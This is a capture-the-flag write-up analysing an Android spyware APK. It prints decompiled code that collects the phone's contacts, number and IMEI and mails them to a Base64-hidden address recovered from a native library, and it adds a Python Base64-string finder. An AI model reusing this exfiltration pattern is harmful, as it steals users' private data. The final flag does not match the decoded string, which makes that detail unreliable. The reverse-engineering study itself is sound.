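Open with jadx-gui
The downloaded file ends in ".apk", so open it with jadx-gui.
Following the challenge hint, search for the keyword mail.
Select the first row and click "Go to".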
public static int sendMailByJavaMail(String mailto, String title, String mailmsg) {
    if (!debug) {
        // SMTP account, host and port all come from the constants class C2
        Mail m = new Mail(C2.MAILUSER, C2.MAILPASS);
        m.set_host(C2.MAILHOST);
        m.set_port(C2.PORT);
        m.set_debuggable(true);
        m.set_to(new String[]{mailto});
        m.set_from(C2.MAILFROME);
        m.set_subject(title);
        m.setBody(mailmsg);
        try {
            if (m.send()) {
                Log.i("IcetestActivity", "Email was sent successfully.");
            } else {
                Log.i("IcetestActivity", "Email was sent failed.");
            }
        } catch (Exception e) {
            Log.e("MailApp", "Could not send email", e);
        }
    }
    return 1;
}
Judging by the data passed in the parameter list of sendMailByJavaMail(), this method is the key.
Search again to see who calls sendMailByJavaMail().
Select the second row and go to it.
public void run(String content2) {
    // Build one "name:number" line per contact entry
    String notebooks = "";
    for (String[] note : NoteBook.get(this.context, IMAPStore.RESPONSE)) {
        notebooks = String.valueOf(notebooks) + note[0] + ":" + note[1] + "\r\n";
    }
    String tel = ((TelephonyManager) this.context.getSystemService("phone")).getLine1Number();
    if (tel == null || tel.equals("")) {
        tel = A2.getNoteBook(content2).phoneNumber;
    }
    A2.getNoteBook(content2);
    if (!A2.isEmpty(notebooks)) {
        // The subject prefix "通讯录" means "contacts"; recipient is C2.MAILSERVER
        A2.sendMailByJavaMail(C2.MAILSERVER, "通讯录(" + tel + "IMEI" + ((TelephonyManager) this.context.getSystemService("phone")).getDeviceId() + ")", notebooks);
    }
}
The recipient is a constant named MAILSERVER; right-click it and choose "Go to declaration".
public static final String CANCELNUMBER = "%23%2321%23";
public static final String MAILFROME = Base64.decode(NativeMethod.m());
public static final String MAILHOST = "";
public static final String MAILPASS = Base64.decode(NativeMethod.pwd());
public static final String MAILSERVER = Base64.decode(NativeMethod.m());
public static final String MAILUSER = Base64.decode(NativeMethod.m());
public static final String MOVENUMBER = "**21*121%23";
public static final String PORT = "25";
public static final String date = "2115-11-1";
public static final String phoneNumber = Base64.decode(NativeMethod.p());
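The value returned by NativeMethod's m is Base64-encoded.
MAILSERVER is the value returned by the NativeMethod.m1m() function in the externally loaded .so file, after Base64 decoding. So we only need to find the Base64-encoded string in the .so file.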
Open with IDA
Select "lib/armeabi/libcore.so", then OK.
Shift + F12
Double-click "MTgyMTg0NjUxMjVAMTYzLmNvbQ=="
This locates the Base64-encoded string: "MTgyMTg0NjUxMjVAMTYzLmNvbQ=="
Base64-decoding it gives flag{18218465125@}
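The IDA steps above (list the strings in libcore.so, pick the Base64-looking one, decode it) can also be scripted. The following is an added example, not part of the original write-up: SAMPLE_BLOB is a constructed byte string standing in for the library's string table, and find_base64_strings is a hypothetical helper name.

```python
import base64
import re
import string

# Constructed sample: a few bytes shaped like a .so string table, with the
# Base64 literal from the write-up placed between unrelated strings.
SAMPLE_BLOB = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 8
    + b"libcore.so\x00GetStringUTFChars\x00NewStringUTF\x00"
    + b"MTgyMTg0NjUxMjVAMTYzLmNvbQ==\x00"
    + b"\x01\x02\xff\xfe__aeabi_unwind_cpp_pr0\x00"
)

# Runs of Base64 alphabet characters, at least 8 long, with optional padding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{8,}={0,2}")
PRINTABLE = set(string.printable.encode()) - set(b"\x0b\x0c")


def find_base64_strings(blob, min_decoded=6):
    """Return (offset, encoded, decoded) for runs that decode to printable text."""
    hits = []
    for match in B64_RUN.finditer(blob):
        encoded = match.group()
        if len(encoded) % 4 != 0:
            continue  # padded Base64 is always a multiple of 4 characters long
        try:
            decoded = base64.b64decode(encoded, validate=True)
        except ValueError:
            continue
        # Symbol names such as NewStringUTF also pass the alphabet check, but
        # they decode to binary noise, so keep only printable results.
        if len(decoded) >= min_decoded and all(b in PRINTABLE for b in decoded):
            hits.append((match.start(), encoded.decode(), decoded.decode()))
    return hits


if __name__ == "__main__":
    for offset, encoded, decoded in find_base64_strings(SAMPLE_BLOB):
        print(f"0x{offset:04x}  {encoded}  ->  {decoded}")
```

To run it against the real library, replace SAMPLE_BLOB with the bytes of lib/armeabi/libcore.so extracted from the APK.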